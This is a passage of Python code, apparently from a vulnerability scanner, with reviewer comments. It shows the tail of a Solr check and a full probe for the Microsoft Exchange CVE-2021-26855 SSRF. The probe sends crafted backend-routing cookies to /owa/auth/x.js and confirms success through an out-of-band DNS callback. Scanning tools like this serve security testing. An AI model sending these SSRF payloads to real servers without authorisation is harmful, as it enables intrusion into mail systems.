            req = dump.dump_all(req).decode('utf-8', 'ignore')
            r = dump.dump_all(r).decode('utf-8', 'ignore')
        except:
            # Bare except: any failure of either request is recorded as "timeout",
            # so the outer Timeout/ConnectionError handlers cannot fire for them.
            req = "timeout"
            r = "timeout"
        if dns_result(md):
            self.vul_info["vul_data"] = req
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            # With core_name None this concatenation raises TypeError -> error_print.
            self.vul_info["prt_info"] = "[dns] [corename: " + self.url + "/solr/" + core_name + " ]"
            verify.scan_print(self.vul_info)
        elif self.vul_info["prt_resu"] != "PoCSuCCeSS" and core_name is not None:
            # prt_resu was set to "null" above and only the branch above changes it,
            # so the first half of this condition is always true here.
            self.vul_info["vul_data"] = r
            self.vul_info["prt_resu"] = "PoC_MaYbE"
            self.vul_info["prt_info"] = "[maybe] [corename: " + self.url + "/solr/" + core_name + " ]"
            verify.scan_print(self.vul_info)
        else:
            verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as e:
        # ``e`` is unused; detail is not surfaced.
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
def cve_2021_26855_poc(self) -> None:
    """Probe for Microsoft Exchange CVE-2021-26855 (SSRF) and report via ``verify``.

    Requests ``/owa/auth/x.js`` with a cookie set whose backend host fields
    carry the ``dns_request()`` token; an out-of-band DNS resolution is
    success. Otherwise the same request is repeated with ``localhost`` and a
    500 response containing the listed error strings is reported as "maybe".
    Holds ``self.threadLock`` for the whole call.

    Returns:
        None; results go through ``verify.*_print``.
    """
    # NOTE(review): released only on the fall-through path, not in a ``finally``.
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Microsoft Exchange: CVE-2021-26855"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Microsoft Exchange Server SSRF"
    self.vul_info["vul_numb"] = "CVE-2021-26855"
    self.vul_info["vul_apps"] = "Exchange"
    self.vul_info["vul_date"] = "2021-03-03"
    self.vul_info["vul_vers"] = "Exchange Server 2010 2013 2016 2019"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "SSRF"
    self.vul_info["vul_data"] = "null"
    # NOTE(review): this description text talks about a post-authentication
    # arbitrary file write and only mentions CVE-2021-26855 as the way to obtain
    # authentication; it does not describe the SSRF that this probe checks.
    self.vul_info["vul_desc"] = "Exchange 中身份验证后的任意文件写入漏洞。攻击者可以通过 Exchange 服务器进行身份验证,同时可以利用漏洞将文件写入服务器上的任何路径。也可以通过利用 CVE-2021-26855 SSRF 漏洞或通过破坏合法管理员的凭据来进行身份验证。"
    self.vul_info["cre_date"] = "2021-03-07"
    self.vul_info["cre_auth"] = "zhzyker"
    url = self.url + "/owa/auth/x.js"
    dns = dns_request()
    cookie_local = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;"
    # .replace() swaps every "localhost" occurrence in the string for the token.
    cookie_dns = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;".replace("localhost", dns)
    try:
        headers = {
            "User-agent": self.ua,
            "Cookie": cookie_dns,
            "Connection": "close"
        }
        # verify=False disables TLS certificate validation.
        res = requests.get(url, headers=headers, timeout=self.timeout, verify=False)
        if dns_result(dns):
            self.vul_info["vul_data"] = dump.dump_all(res).decode('utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["vul_payd"] = headers["Cookie"]
            self.vul_info["prt_info"] = "[ssrf] [dns] [cookie: " + headers["Cookie"] + "]"
        else:
            # Second attempt with the localhost cookie; ``headers`` and ``res`` are
            # rebound, so the "maybe" record refers to this request, not the first.
            headers = {
                "User-agent": self.ua,
                "Cookie": cookie_local,
                "Connection": "close"
            }
            res = requests.get(url, headers=headers, timeout=self.timeout, verify=False)
            if res.status_code == 500 and "NegotiateSecurityContext failed with for host" in res.text:
                if r"TargetUnknown" in res.text and r"localhost" in res.text:
                    self.vul_info["vul_data"] = dump.dump_all(res).decode('utf-8', 'ignore')
                    self.vul_info["prt_resu"] = "PoC_MaYbE"
                    self.vul_info["vul_payd"] = headers["Cookie"]
                    self.vul_info["prt_info"] = "[ssrf] [maybe] [cookie: " + headers["Cookie"] + "]"
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as error:
        # ``error`` is unused; detail is not surfaced.
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()